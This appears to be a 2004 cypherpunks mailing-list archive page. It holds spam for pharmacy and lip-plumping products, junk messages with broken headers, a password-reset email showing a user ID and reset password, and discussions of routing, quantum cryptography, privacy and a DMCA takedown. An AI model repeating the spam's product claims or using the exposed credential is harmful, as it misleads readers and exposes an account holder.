fireplace.   In the fireplace a pot of vegetable soup simmers
over a small fire.  Chip sniffs the air as the skunk grabs two
bowls, and spoons from a large wooden cabinet that stands in
the far corner.
Mac smiles as he notices the rabbit sniffing the soup.
He walks over placing one of the bowls on the table. He then
asks. "You like vegetable soup fellow?" Chip looks at the
skunk, and says. "Oh yes, and it smells very good." The skunk
fills one bowl, then puts it on the table, and says. "Sit
yourself down, and have some."




Are you interested?... resolversTennessee

2004-04-12 Thread Kriz

Bresenham withers Verdi blending Indian
C1al1s, [EMAIL PROTECTED]@ and other men's pha-rmacy online.
Special April's d[i]sc0unts.
early Schloss treasury Bulgarian lubricant
We have everything that every man must have 
to make his woman happy :-)
V1S-1T
lampoon timeouts pretexts veneration astronaut
addicts Araby icing egging peaceable







Re[8]: , , , , , ,

2004-04-12 Thread Stellar R. Scotsman



9 



h}
h+d;
h+d;





l



To: =?koi8-r?B?5MXNyc7V?=
Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?=
Date: Tue, 6 Apr 2004 23:43:08 +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset=koi8-r
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106















Re[2]: , , , , , ,

2004-04-12 Thread Wantoner S. Overlapping



9 



h}
h+d;
h+d;





l



To: =?koi8-r?B?5MXNyc7V?=
Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?=
Date: Tue, 6 Apr 2004 23:43:08 +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset=koi8-r
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106















Re[6]: , , , , , ,

2004-04-12 Thread Treasuries M. Vortices



9 



h}
h+d;
h+d;





l



To: =?koi8-r?B?5MXNyc7V?=
Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?=
Date: Tue, 6 Apr 2004 23:43:08 +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset=koi8-r
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106















Re[1]: , , , , , ,

2004-04-12 Thread Temblor K. Inflexion



9 



h}
h+d;
h+d;





l



To: =?koi8-r?B?5MXNyc7V?=
Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?=
Date: Tue, 6 Apr 2004 23:43:08 +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset=koi8-r
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106















Re[9]: , , , , , ,

2004-04-12 Thread Ban G. Toed



9 



h}
h+d;
h+d;





l



To: =?koi8-r?B?5MXNyc7V?=
Subject: =?koi8-r?B?68/NzcXS3i7Q0sXEzM/WIG5ldw==?=
Date: Tue, 6 Apr 2004 23:43:08 +0400
MIME-Version: 1.0
Content-Type: text/plain;
charset=koi8-r
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106















Symantec AVF detected an unrepairable virus in a message you sent

2004-04-12 Thread Administrator

Subject of the message: Does it matter?
Recipient of the message: Customer Service





Fornicalia Lawmaker Moves to Block Gmail

2004-04-12 Thread Riad S. Wahby
SAN FRANCISCO (Reuters) - A California state senator on Monday said
she was drafting legislation to block Google Inc.'s free e-mail
service Gmail because it would place advertising in personal
messages after searching them for key words.

http://news.yahoo.com/news?tmpl=storyu=/nm/20040412/wr_nm/tech_google_dc_1

A private interaction between two consenting parties has absolutely
nothing to do with the state, period.  The bitch supporting this shit
should be removed from office forthwith.

-- 
Riad Wahby
[EMAIL PROTECTED]
MIT VI-2 M.Eng



Re: Fornicalia Lawmaker Moves to Block Gmail

2004-04-12 Thread Dave Howe
Riad S. Wahby wrote:
 SAN FRANCISCO (Reuters) - A California state senator on Monday said
 she was drafting legislation to block Google Inc.'s free e-mail
 service Gmail because it would place advertising in personal
 messages after searching them for key words.
Is she planning to block all the advertising supported email services, just
those associated with search engines, or just those who actually try to make
the ads relevent?



Modern Miracles Take Years Off Your Face!

2004-04-12 Thread Shannon


 


B'eauty Secrets 
Newsletter
 
By: Jamie Anderton - Freelance Writer & B'eauty Expert
 
 
Better than Lip I'njections?

Have you ever wanted to get c'ollagen i'njections? My research found an excellent pain free option for you ladies that don’t want to spend thousands of dollars on surgery…

Dear Jamie, Have you ever heard of C'ity L'ips? One of my girlfriends uses it constantly and she swears up and down that it has really made her lips bigger after just a few short weeks. I’ve wanted to get c'ollagen i'njections for years but it’s so expensive. Do you think C'ity L'ips will make my lips fuller?
Amber DaviesNewport Beach, CA

Well Amber, I personally interviewed a world renowned biochemist who developed the C'ity L'ips formula. I walked away from that interview with a new respect for modern c'osmetics. C'ity L'ips convinced me that they have the most advanced C'ollagen Building T'reatment available that is different than any other product on the market today claiming to be a "lip p'lumper".

C'ity L'ips uses a unique Oligopept'ide
Technology that stimulates lips to increase production of their own c'ollagen and hy'alonuronic acid. C'ity L'ips then adds C'eladrol to protect the new c'ollagen from breakdown. C'eladrol is also a patented anti-inflammatory. How can an anti-inflammatory help plump your lips? That’s exactly what I asked! C'eladrol helps retain moisture and repair damaged tissue, making your lips full and healthy. He also pointed out that other lip p'lumpers have harsh spices that irritate your lips and inflame them. C'ity L'ips actually builds c'ollagen, making your lips grow!
SAVE THIS ARTICLE
:::
C'ity L'ips impressed me with the shocking revelation that they have had less than a 1% return rate on their Lip P'lumping T'reatment! C'ity L'ips is Guaranteed to work or your Money Back. C'ity L'ips is an International company that has customers in 74 countries.  Movie stars,  celebrities, doctors, and people of all walks of life use C'ity L'ips everyday They must be doing something right!C'ity L'ips is a highly effective and inexpensive alternative to c'ollagen i'njections.  More Details HERE... 
 Jamie Anderton








  Laugh and grow fat. A drowning man will clutch at a straw whilst the cat'S away, the mice will play laugh and grow fat in for a penny, in for a pound children should be seen and not heard least said, soonest mended a miss is as good as a mile the early bird catches the worm familiarity breeds contempt laugh and grow fat. Charity begins at home a friend in need is a friend indeed pride goes before a fall forbidden fruit tastes sweeter there are none so deaf as those who will not hear charity begins at home many hands make light work every dog has its day don'T count your chickens before they hatch pride goes before a fall. Don'T put all your eggs in one basket. 









Better Than Collagen Lip Injections?

2004-04-12 Thread Jennie


 


B'eauty Secrets 
Newsletter
 
By: Jamie Anderton - Freelance Writer & B'eauty Expert
 
 
Better than Lip I'njections?

Have you ever wanted to get c'ollagen i'njections? My research found an excellent pain free option for you ladies that don’t want to spend thousands of dollars on surgery…

Dear Jamie, Have you ever heard of C'ity L'ips? One of my girlfriends uses it constantly and she swears up and down that it has really made her lips bigger after just a few short weeks. I’ve wanted to get c'ollagen i'njections for years but it’s so expensive. Do you think C'ity L'ips will make my lips fuller?
Amber DaviesNewport Beach, CA

Well Amber, I personally interviewed a world renowned biochemist who developed the C'ity L'ips formula. I walked away from that interview with a new respect for modern c'osmetics. C'ity L'ips convinced me that they have the most advanced C'ollagen Building T'reatment available that is different than any other product on the market today claiming to be a "lip p'lumper".

C'ity L'ips uses a unique Oligopept'ide
Technology that stimulates lips to increase production of their own c'ollagen and hy'alonuronic acid. C'ity L'ips then adds C'eladrol to protect the new c'ollagen from !
 breakdown. C'eladrol is also a patented anti-inflammatory. How can an anti-inflammatory help plump your lips? That’s exactly what I asked! C'eladrol helps retain moisture and repair damaged tissue, making your lips full and healthy. He also pointed out that other lip p'lumpers have harsh spices that irritate your lips and inflame them. C'ity L'ips actually builds c'ollagen, making your lips grow!
SAVE THIS ARTICLE
:::
C'ity L'ips impressed me with the shocking revelation that they have had less than a 1% return rate on their Lip P'lumping T'reatment! C'ity L'ips is Guaranteed to work or your Money Back. C'ity L'ips is an International company that has customers in 74 countries.  Movie stars,  celebrities, doctors, and people of all walks of life use C'ity L'ips everyday They must be doing something right!C'ity L'ips is a highly effective and inexpensive alternative to c'ollagen i'njections.  More Details HERE... 
 Jamie Anderton








  A rolling stone gathers no moss. Forbidden fruit tastes sweeter. Two heads are better than one. Whilst the cat'S away, the mice will play. Great minds think alike.   A friend in need is a friend indeed. Still waters run deep. Don'T count your chickens before they hatch. Too many cooks spoil the broth. Empty vessels make most noise. 









American Airlines is an info whore too

2004-04-12 Thread Major Variola (ret.)

American Airlines admits disclosing passenger data

WASHINGTON (AFP) - A contractor for American Airlines has admitted to
sharing personal passenger information with the US government and other
companies, thrusting the world's largest carrier into a bitter
controversy over rights to privacy in the post-September 11 world.

The disclosure, certain to alarm civil libertarians, made American the
third leading US airline caught disseminating private data behind the
back of its customers in the name of fighting terrorism.
 snip
http://news.yahoo.com/news?tmpl=storycid=1521u=/afp/20040411/pl_afp/us_attacks_air_040411224313printer=1





Re: On Killing Blaster

2004-04-12 Thread Major Variola (ret)
At 04:26 PM 4/11/04 -0400, Tyler Durden wrote:
When faced with force, you reply with force when you can.

Nah. This isn't even true in a fistfight, except when the guy you're
fighting is a) significantly smaller than you, and b) less trained.
More
often than not, if someone attacks you, it's because they either have
or
perceive themselves to have an overwhelmingly superior force.

See asymetric warfare

Sometimes a stronger adversary decides its not worth it.  See Lebanon
and a few hundred dead Marines.  See Vietnam.

(Speaking of which, I heard McCain arguing that if we leave .iq
the place becomes a hotbed of 'terrorism'.  Anyone remember the
Domino theory?)

And of course, if it's possible to
diarm your opponent without actually killing or maiming him, that's
sometimes far more appropriate...

No, then he'll sue you.

As someone said better than myself, Crypto is one little tool in an
aresenal
against Men with Guns...in the end Men With Guns will probably try to

shoot away bits, but it's not going to work too well.

You forget that there are no bits which are not physical.  Physical
things reside on land leased from the State (try not paying your
real estate taxes).  All cables make a landing somewhere.

Meanwhile, P2P, WiFi,
Crypto,and lots of other stuff will slowly start to chip away at things
on
the edges, until the core is exposed.

Where are you going to buy your hardware from, that it can't be
shut down?   How are you going to hide your TX from the DXing
white vans?








washingtonpost.com Account Request

2004-04-12 Thread register

Dear [EMAIL PROTECTED],
 
As you requested, this e-mail provides your User ID and a
reset password for the washingtonpost.com site.  The new password
is provided for your security.
 
1) Note your User ID and reset password.
 
[EMAIL PROTECTED]
ZqKkNkyx
 
2) Click the link below and follow the instructions provided to
sign-in and change your password.
 
http://www.washingtonpost.com/ac2/wp-dyn?node=admin/registration/managedestination=passwordnextstep=update
 
(If the link is not clickable, you can copy and paste the link into
your web browser address window.)
 
If you have any questions or comments, please visit our Customer Care Center.  Please 
do not reply directly to this message.
 
Customer Care
washingtonpost.com
 
 
If you did not request this information from washingtonpost.com,
someone has mistakenly entered your e-mail address when
requesting a new password. Please ignore this message or click the
url above to select a new password for your account. To protect
your privacy, we will only send this information to the e-mail
address provided for this account.
 



Optimice el rendimiento de su PC en minutos

2004-04-12 Thread Real.com Accessories






  
(Al final del mensaje hay información sobre cómo borrarse de la lista.)
  
  

  
  

  


  


  

  

  
  

  
  
  

  
Optimice la velocidad de su PC
  
  

  
  
PC Booster contiene todos los secretos para hacer más rápido su equipo en minutos, ¡sin tener que invertir en hardware adicional!
  

  

  
  
	  
	
	  
	  
	
	
	
	  
	  
	  
	  
	  Descárguelo ahora
	  
	  	
	  
	  
	  
	  
  

  

  


  


  




  

  
  

  
  Instálelo y relájese: PC Booster hace todo el trabajo


  
  Estabiliza su PC y evita bloqueos


  
  Inicia y apaga Windows más rápido


  
  No hay que ser un experto en PC


  
  

  


  
  

  
  

  


  Descargue PC Booster hoy mismo

  


  


  

  
  

  


  
Ha recibido este mensaje porque ha descargado RealOne, RealPlayer o RealJukebox de Real.com y ha solicitado que le enviemos información sobre los productos, actualizaciones y ofertas especiales de RealNetworks. Si no desea recibir ningún otro mensaje, haga clic en el enlace borrarse de abajo. 

  Política de confidencialidad | Borrarse

   RealOne, RealNetworks, RealPlayer, RealJukebox y Real.com son marcas comerciales o registradas de RealNetworks, Inc. Todas las demás empresas o productos que aparecen en este documento son marcas comerciales o registradas de sus respectivos propietarios. 
  














Geodesic markets for nuclear secrets

2004-04-12 Thread Bill Stewart


The price of nuclear secrets has been dropping rapidly:
http://theonion.com/news/index.php?issue=4014
WASHINGTON, DC­ Top-secret information about the design, construction, and 
delivery of nuclear weapons has never been more affordable than it is 
today, CIA Director George Tenet announced Monday.

(ok, ok, so it's the Onion...  It's still geodesic markets at work, even if 
it's all made up :-)

---
Bill Stewart  [EMAIL PROTECTED] 



Re: Hierarchy, Force Monopoly, and Geodesic Societies

2004-04-12 Thread Jim Dixon
On Sun, 11 Apr 2004, sunder wrote:

  The term is used because most or all trees in the region where the English
  language originated are shaped just like that: they have a single trunk
  which forks into branches which may themselves fork and so on.  These
  branches do not connect back to one another.

 I believe the real issue here is one of being able to stretch your mind
 into seeing things from different points of view.  This is the reason I
 brought in the quasi-mystical quote about the sphere whose center is
 everywhere.

Someone comes to me and says: the Internet is a tree.  Then he points me
at a graph of inter-AS (Autonomous System) connections to illustrate his
point.  That graph includes all of those seemingly redundant connections
that make it _not_ a tree.  These seemingly redundant connections are in
fact a high proportion of all connections.  That is to say, the graph is
accurate and his statement wasn't.

You can see the Internet in many ways.  You can run a single traceroute
and see it as a line.  You can ping broadcast on your LAN and see it as a
chorus line.

If you understand what you are looking at, you can run traceroutes and see
stable rings: hot potato routing at work, where the packets go out one way
and come back another.

Then again, I have spoken to hundreds? thousands? of people who think that
the Internet _is_ the World Wide Web.

 Let's explain why we have multiple connections and what types of these you
 can expect.  There are two common types of multiple connections:

 A) Two links to the same ISP:  In terms of redundancy for the purposes of
 being fault tolerant, only one of the multiple links is ever used.  With

You don't understand and you are quite wrong.

If one AS has more than one link to another AS, there are often very good
reasons for it, and both links are used.  If network A peers with network
B in both Paris and New York, both will generally dump traffic for the
other network at the nearest connection. Why?  Well, on the one hand,
there is no reason to carry packets originating in Paris and destined for
a host in Paris all the way to New York.  On the other hand, many or most
networks employ hot potato routing, meaning that if network A picks up a
packet for network B in Paris, it dumps it on network B as soon as it can,
to minimize costs, wherever the destination might be.  Some networks,
concerned with quality of service, adopt the opposite strategy, and carry
packets as far as possible within their own network.

 most ISP's, when you negotiate a contract for a backup connection, it's
 with the understanding that you'll only use it when the main one goes down.

I don't think that you have any evidence for this assertion about what
characterizes 'most' backup agreements.  I do know that most networks
regard this sort of statistical information as highly confidential.

 B) You have multiple connections to different ISP's (possibly with peering
 contracts, etc.)  In this case when a node at your location tries to
 contact some other node on the internet, it's traffic doesn't go over ALL
 of your connections - it takes only a single path.  [Ok, if your routers
 are correcting for an outage, then perhaps you'll see different paths being
 taken, but this is just the routing tables/routers settling or converging.]

The world is more complicated than this.  Much more.

 If both case A and case B, a single node in your location will see the
 entire internet as a tree with the root of that tree being the default
 gateway.  (i.e. go back to doing traceroutes.)  In the case of a
 multi-homed machine, or machine that participates in routing, it itself
 becomes the root of the tree.

There are tens of thousands of machines on the Internet that don't have
a default gateway.

Machines that participate in backbone routing have multiple connections
and aren't the root of a tree in any normal sense of the word.  There is
no parent-child relationship between such routers: they are peers.
These peers participate in a highly complex graph which dances
continuously.  The result is that routing has a large stochastic
component: if you can understand what you are looking at, you often see
traceroutes involving packets jumping sometimes one way, sometimes
another.

To make things even more difficult to understand, an increasing amount of
traffic flows through MPLS tunnels, which are invisible to traceroutes.

 Once you eliminate cycles, and you do so in real life, you go back to a
 tree.  You only see the alternate paths used when failover or routing
 errors occur.

This just isn't true.  Hot potato routing is the most easily understood
example: traffic goes out one way and back another.  It does this because
the ASs involved have set their policy that way.

Backbone routers have lots of knobs to configure traffic flow.  Some of
these allow you to throttle it, some allow you to split flows according to
traffic type, some allow to to split flows statistically, some allow you
to 

Re: On Needing Killing (Orwell was an optimist)

2004-04-12 Thread Major Variola (ret)
At 07:20 PM 4/11/04 +, Justin wrote:
Major Variola (ret) (2004-04-11 16:42Z) wrote:

 Blacknet is a robust archive for words, immune to force
 (by State or private actors), but merely words.

With all due respect to the principle of freedom of speech and all
that,
I think that cypherpunks, and people in general, give far too little
respect to words, as if words are a vague, unimportant, and remote link

in the chain of causation of acts or failure-to-acts.  I don't see
anything wrong with Orwell's view that words control the future's view
of history.  His certainly have.

Language is how you manipulate people from a distance.   Much
more convenient than hitting them.

Crypto *can* keep bits free.  And so maybe language.

But Men with Guns control physical reality, which limits what
those bits can do.  Read the archives on the problems with
linking credits to dollars or physical merchandise.

Note that the Saudis are organizing conferences on registering
and recording hawala.  Note that the US will kidnap (mexican
MD for instance) if they can't extradite.

And how many will run a prohibited node when
the penalty is watching your family assets seized,
family members raped, before your eyes are gouged out?

---
It can't happen here -Suzy Creamcheese






Re: On Killing Blaster

2004-04-12 Thread Major Variola (ret)
At 04:26 PM 4/11/04 -0400, Tyler Durden wrote:
When faced with force, you reply with force when you can.

Nah. This isn't even true in a fistfight, except when the guy you're
fighting is a) significantly smaller than you, and b) less trained.
More
often than not, if someone attacks you, it's because they either have
or
perceive themselves to have an overwhelmingly superior force.

See asymetric warfare

Sometimes a stronger adversary decides its not worth it.  See Lebanon
and a few hundred dead Marines.  See Vietnam.

(Speaking of which, I heard McCain arguing that if we leave .iq
the place becomes a hotbed of 'terrorism'.  Anyone remember the
Domino theory?)

And of course, if it's possible to
diarm your opponent without actually killing or maiming him, that's
sometimes far more appropriate...

No, then he'll sue you.

As someone said better than myself, Crypto is one little tool in an
aresenal
against Men with Guns...in the end Men With Guns will probably try to

shoot away bits, but it's not going to work too well.

You forget that there are no bits which are not physical.  Physical
things reside on land leased from the State (try not paying your
real estate taxes).  All cables make a landing somewhere.

Meanwhile, P2P, WiFi,
Crypto,and lots of other stuff will slowly start to chip away at things
on
the edges, until the core is exposed.

Where are you going to buy your hardware from, that it can't be
shut down?   How are you going to hide your TX from the DXing
white vans?








my periodic rant on quantum crypto

2004-04-12 Thread R. A. Hettinga

--- begin forwarded text


Delivered-To: [EMAIL PROTECTED]
To: [EMAIL PROTECTED]
Subject: my periodic rant on quantum crypto
From: Perry E. Metzger [EMAIL PROTECTED]
Date: Mon, 12 Apr 2004 15:37:33 -0400
Sender: [EMAIL PROTECTED]


/. is running yet another story on quantum cryptography today, with
the usual breathless hype:

http://science.slashdot.org/article.pl?sid=04/04/12/133623

I'm especially unimpressed with the Does this spell the
end of the field of cryptography? comment.

For those who don't know much about what it is, Quantum Cryptography
is a very expensive way of producing an unauthenticated link
encryption device. It is useless for any application other than link
encryption over a short distance and requires a dedicated optical
fiber to work.

QC has no properties that render it especially better for link
encryption than, say, a box from one of several vendors running AES on
the link instead. It is perhaps theoretically safer, but in practice
no one is going to break AES either -- they're going to bribe the
minimum wage guard at your colo to have 20 minutes alone with your box
while they install a tap on the clear side of it (or worse, they'll
slip in while the guard is asleep at his desk.)

QC still requires link authentication (lest someone else other than
the people you think you're talking to terminate your fiber
instead). As a result of this, you can't really get rid of key
management, so QC isn't going to buy you freedom from that.

QC can only run over a dedicated fiber over a short run, where more
normal mechanisms can work fine over any sort of medium -- copper, the
PSTN, the internet, etc, and can operate without distance limitation.

QC is fiendishly costly -- orders of magnitude more expensive than an
AES based link encryption box.

QC is extremely hard to test to assure there are no hardware or other
failures -- given the key in use, I can use intercepted traffic to
assure my AES link encryption box is working correctly, but I have no
such mechanism for a QC box.

On top of all of this, the real problems in computer security these
days have nothing to do with stuff like how your link encryption box
works and everything to do with stuff like buffer overflows, bad
network architecture, etc.

Given that what we're dealing with is a very limited technology that
for a very high price will render you security that is at best not
particularly better than what much more economical solutions will
yield, why do people keep hyping this?  Indeed, why do people buy these
boxes, if indeed anyone is buying them?

It is stunning that a lab curiosity continues to be mentioned over
and over again, not to mention to see venture capitalists dump money
after it.

BTW, none of this has anything to do with Quantum Computing, which
may indeed yield breakthroughs someday in areas such as factoring but
which is totally unrelated...

Perry

-
The Cryptography Mailing List
Unsubscribe by sending unsubscribe cryptography to [EMAIL PROTECTED]

--- end forwarded text


-- 
-
R. A. Hettinga mailto: [EMAIL PROTECTED]
The Internet Bearer Underwriting Corporation http://www.ibuc.com/
44 Farquhar Street, Boston, MA 02131 USA
... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience. -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



nettime PlayFair Sarovar

2004-04-12 Thread R. A. Hettinga

--- begin forwarded text


To: nettime [EMAIL PROTECTED]
From: kevin lahoda [EMAIL PROTECTED]
Subject: nettime PlayFair   Sarovar
Date: Sat, 10 Apr 2004 14:51:11 -0400
Sender: [EMAIL PROTECTED]
Reply-To: kevin lahoda [EMAIL PROTECTED]

Sarovar.org is India's first portal to host projects under Free/Open
source licenses. It is located in Trivandrum, India and hosted at Asianet
data center. Sarovar.org is customised, installed and maintained by
Linuxense as part of their community services and sponsored by River
Valley Technologies.

 From Sarovar's  http://sarovar.org/  Latest News: After a short
vacation thanks to a Cease and Desist letter from Apple, we're back
online. Many thanks to Sarovar for hosting us..  -PlayFair 

Sarovar now hosts The PlayFair project  http://playfair.sarovar.org/ 
which SourceForge has declined in order to avoid tangling with Apple's
decision to go DMCA on their ass 
http://slashdot.org/article.pl?sid=04/04/09/1554203 . Like something from
a Gibson novel, I wouldn't doubt if Sarovar rises to meet more than
another of these occasions in the near future.

And so, we have more contentious open source code hosted outside of the US
in order to circumvent unfavorable legal processes.

Offtshoring in itself is not all that new (another example: 
http://www.citi.umich.edu/u/provos/honeyd/ ). Here is how this one gets
interesting:  A big guy - Apple, goes a little sour, another (kind of) big
guy - SourceForge, takes the easy route, and then an offshore repository
stands in.

With all of this, one thing that should not be ignored is that SourceForge
should be shamed for not holding itself stronger. In a way SourceForge's
decline of PlayFair and non-usage of the Safe Harbor Provision Act 
http://www.chillingeffects.org/dmca512/  is an admit of defeat and a
failure to stand up for one's (community's) rights.

What comes out of this?

Well, maybe Apple wins because they avoid a chance of being tarnished.
Imagine what consumer level acknowledgment of the reality of Apple
marketing a clean yet gritty 'Garage Band' motif (with all that punk rock
implies) while at the same time sleeping with DRM, recently RIAA, and now
DMCA, could entail... One can easily see that Apple is dancing itself into
a bit of a gamble. But then again, what does an Ipod zombie care about
these acronyms anyway?

What does SourceForge get? Not much. This only makes it easier for them to
weasle out of the next situation that comes up. Not to mention they also
missed a good chance to join PlayFair in telling Apple what's what.

k

http://sarovar.org/ http://sarovar.org/projects/playfair/
http://slashdot.org/article.pl?sid=04/04/09/1554203
http://www.chillingeffects.org/dmca512/
http://www.citi.umich.edu/u/provos/honeyd/

http://www.theregister.co.uk/2004/04/09/playfair_dmca_takedown/




#  distributed via nettime: no commercial use without permission
#  nettime is a moderated mailing list for net criticism,
#  collaborative text filtering and cultural politics of the nets
#  more info: [EMAIL PROTECTED] and info nettime-l in the msg body
#  archive: http://www.nettime.org contact: [EMAIL PROTECTED]

--- end forwarded text


-- 
-
R. A. Hettinga mailto: [EMAIL PROTECTED]
The Internet Bearer Underwriting Corporation http://www.ibuc.com/
44 Farquhar Street, Boston, MA 02131 USA
... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience. -- Edward Gibbon, 'Decline and Fall of the Roman Empire'



Re: nettime PlayFair Sarovar

2004-04-12 Thread proclus

The GNU-Darwin Distribution is taking a stand against what Apple has
done, and we have blackened our website so that people will take notice.

http://www.gnu-darwin.org/

MacNN is also running a story about it, and it is interesting that
Apple has sometimes used the DMCA to threaten them as well.

http://www.macnn.com/news/24175

There are some discussion threads about it, although most messages are
still in the queue and not yet visible.

http://sourceforge.net/mailarchive/forum.php?forum_id=6042

Here is a link to the original post.

http://sourceforge.net/forum/forum.php?forum_id=367147

Regards,
proclus
http://www.gnu-darwin.org/


On 12 Apr, R. A. Hettinga wrote:
 
 
 --- begin forwarded text
 
 
 To: nettime [EMAIL PROTECTED]
 From: kevin lahoda [EMAIL PROTECTED]
 Subject: nettime PlayFair   Sarovar
 Date: Sat, 10 Apr 2004 14:51:11 -0400
 Sender: [EMAIL PROTECTED]
 Reply-To: kevin lahoda [EMAIL PROTECTED]
 
 Sarovar.org is India's first portal to host projects under Free/Open
 source licenses. It is located in Trivandrum, India and hosted at Asianet
 data center. Sarovar.org is customised, installed and maintained by
 Linuxense as part of their community services and sponsored by River
 Valley Technologies.
 
  From Sarovar's  http://sarovar.org/  Latest News: After a short
 vacation thanks to a Cease and Desist letter from Apple, we're back
 online. Many thanks to Sarovar for hosting us..  -PlayFair 
 
 Sarovar now hosts The PlayFair project  http://playfair.sarovar.org/ 
 which SourceForge has declined in order to avoid tangling with Apple's
 decision to go DMCA on their ass 
 http://slashdot.org/article.pl?sid=04/04/09/1554203 . Like something from
 a Gibson novel, I wouldn't doubt if Sarovar rises to meet more than
 another of these occasions in the near future.
 
 And so, we have more contentious open source code hosted outside of the US
 in order to circumvent unfavorable legal processes.
 
 Offtshoring in itself is not all that new (another example: 
 http://www.citi.umich.edu/u/provos/honeyd/ ). Here is how this one gets
 interesting:  A big guy - Apple, goes a little sour, another (kind of) big
 guy - SourceForge, takes the easy route, and then an offshore repository
 stands in.
 
 With all of this, one thing that should not be ignored is that SourceForge
 should be shamed for not holding itself stronger. In a way SourceForge's
 decline of PlayFair and non-usage of the Safe Harbor Provision Act 
 http://www.chillingeffects.org/dmca512/  is an admit of defeat and a
 failure to stand up for one's (community's) rights.
 
 What comes out of this?
 
 Well, maybe Apple wins because they avoid a chance of being tarnished.
 Imagine what consumer level acknowledgment of the reality of Apple
 marketing a clean yet gritty 'Garage Band' motif (with all that punk rock
 implies) while at the same time sleeping with DRM, recently RIAA, and now
 DMCA, could entail... One can easily see that Apple is dancing itself into
 a bit of a gamble. But then again, what does an Ipod zombie care about
 these acronyms anyway?
 
 What does SourceForge get? Not much. This only makes it easier for them to
 weasle out of the next situation that comes up. Not to mention they also
 missed a good chance to join PlayFair in telling Apple what's what.
 
 k
 
 http://sarovar.org/ http://sarovar.org/projects/playfair/
 http://slashdot.org/article.pl?sid=04/04/09/1554203
 http://www.chillingeffects.org/dmca512/
 http://www.citi.umich.edu/u/provos/honeyd/
 
 http://www.theregister.co.uk/2004/04/09/playfair_dmca_takedown/
 
 
 
 
 #  distributed via nettime: no commercial use without permission
 #  nettime is a moderated mailing list for net criticism,
 #  collaborative text filtering and cultural politics of the nets
 #  more info: [EMAIL PROTECTED] and info nettime-l in the msg body
 #  archive: http://www.nettime.org contact: [EMAIL PROTECTED]
 
 --- end forwarded text
 
 

-- 
Visit proclus realm! http://proclus.tripod.com/
-BEGIN GEEK CODE BLOCK-
Version: 3.1
GMU/S d+@ s: a+ C UBULI$ P+ L+++() E--- W++ N- !o K- w--- !O
M++@ V-- PS+++ PE Y+ PGP-- t+++(+) 5+++ X+ R tv-(--)@ b !DI D- G e
h--- r+++ y
--END GEEK CODE BLOCK--





pgp0.pgp
Description: PGP signature


Re: nettime PlayFair Sarovar

2004-04-12 Thread proclus
On 12 Apr, To: R. A. Hettinga wrote:
 http://sourceforge.net/mailarchive/forum.php?forum_id=6042 

Ahh, that link just dropped ;-}.  Here is another.

http://www.advogato.org/article/764.html

Regards,
proclus
http://www.gnu-darwin.org/


-- 
Visit proclus realm! http://proclus.tripod.com/
-BEGIN GEEK CODE BLOCK-
Version: 3.1
GMU/S d+@ s: a+ C UBULI$ P+ L+++() E--- W++ N- !o K- w--- !O
M++@ V-- PS+++ PE Y+ PGP-- t+++(+) 5+++ X+ R tv-(--)@ b !DI D- G e
h--- r+++ y
--END GEEK CODE BLOCK--




pgp0.pgp
Description: PGP signature